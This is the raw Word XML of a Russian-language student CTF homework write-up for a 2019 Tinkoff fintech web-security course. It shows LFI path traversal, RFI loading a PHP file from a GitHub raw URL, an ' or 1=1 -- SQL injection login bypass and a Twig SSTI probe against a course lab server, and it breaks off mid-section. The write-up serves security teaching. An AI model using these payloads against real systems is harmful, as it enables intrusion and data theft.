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rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d64e8"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d64e8"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#tinkoff fintech</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">homework #1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6jynaot9cbnq" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d64e8"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eqpoxxy8gmzz" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27.02.2019</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ogp52fyi6djo" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задачи:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Необходимо выполнить максимальное количество заданий на нашем CTF портале.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый захваченный флаг нужно прислать с подробным описанием захвата.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценки будут проставлены на основе количества захваченных флагов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="16510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65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1pw1ma28yzdz" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI: D GRADE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_buwz1tcz7y35" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location: /var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Для нахождение флага достаточно просто использовать уязвимость </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lfi path traversal</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1228725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="552450"/>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7"/>
                    <a:srcRect b="37864" l="0" r="0" t="5825"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="552450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="520700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Выведет нам список паролей. А еще мы узнаем где находится корневая директория.  Заглянем в </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/lfi.php?page=../../../../../var/www/html/flag</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">И все :)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>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c02952xdv0lq" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI: D GRADE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_21oksyndtffe" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location: $flag variable in rfi.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions..</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Не многим более сложная задача. Для нахождение флага загрузим код на какой-нибуть внешний источник. Я использовал свой (не секьюрно :D ) репозиторий на гитхабе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/rfi.php?page=https://raw.githubusercontent.com/s-yakubovskiy/init/master/header.inc.php.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">И все, флаг у нас.</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8s4564vxjldq" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection: D Grade.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nyuq6uvno22b" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location: grab admin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab shows how to easy gain access to the database. If attacker found this vulnerability he may read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file presented on the DBMS file system and in some cases issue commands to the operating system.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы получить флаг - нужно зайти под админом. Пароля мы не знает, разумеется. Пробуем пароль lol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/sql-inj.php?login=admin&amp;password=lol</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Введен неверный пароль. Поэтому надо поменять логику добавив 100% правильное выражение вида: or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Для этого надо использовать sql injection вставив ‘ or 1=1 --1%’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/sql-inj.php?login=admin&amp;password=lol%27%20or%201=1%20--%201%%27</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">В итоге</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561975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4349353" cy="1338263"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="1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349353" cy="1338263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_edx4po9ibueo" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI: D Grade </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5esofilh1wjh" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location: in $flag var </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Было сложно. Очевидно, что исходя из названия надо было искать уязвимость в шаблонизаторе. Тут использовался twig шаблонизатор. Проверить можно было с помощью {{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="838200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Смотрим исходники</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
